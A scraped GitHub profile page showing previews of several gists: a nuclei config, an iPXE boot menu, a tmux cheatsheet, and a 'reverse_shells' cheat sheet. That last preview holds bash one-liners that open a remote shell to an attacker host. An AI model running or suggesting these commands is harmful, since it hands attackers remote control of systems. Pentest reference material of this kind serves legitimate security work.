Skip to content

Instantly share code, notes, and snippets.

View savenas's full-sized avatar
🎱
Magic ball

Tomas Savėnas savenas

🎱
Magic ball
View GitHub Profile
@manasmbellani
manasmbellani / .cent.yaml
Last active June 22, 2024 18:44
My cent nuclei templates file
# Directories to exclude
exclude-dirs:
- SOMETHING
# Files to exclude
exclude-files:
- README.md
- .gitignore
- .pre-commit-config.yaml
- LICENSE
@mintsoft
mintsoft / iPXE_WDS_EFI.md
Last active January 5, 2024 10:42
iPXE + WDS + EFI Boot Menu
javascript: (function () {
function c() {
var e = document.createElement("link");
e.setAttribute("type", "text/css");
e.setAttribute("rel", "stylesheet");
e.setAttribute("href", f);
e.setAttribute("class", l);
document.body.appendChild(e)
}
function h() {
@noku
noku / tmux-cheatsheet.markdown
Last active June 7, 2024 23:47 — forked from MohamedAlaa/tmux-cheatsheet.markdown
tmux shortcuts & cheatsheet

Tmux Shortcuts & Cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname
@sckalath
sckalath / reverse_shells
Created November 7, 2014 03:14
Reverse shells
#bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
#bash alt
exec /bin/bash 0&0 2>&0
#bash alt 2
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
#bash alt 3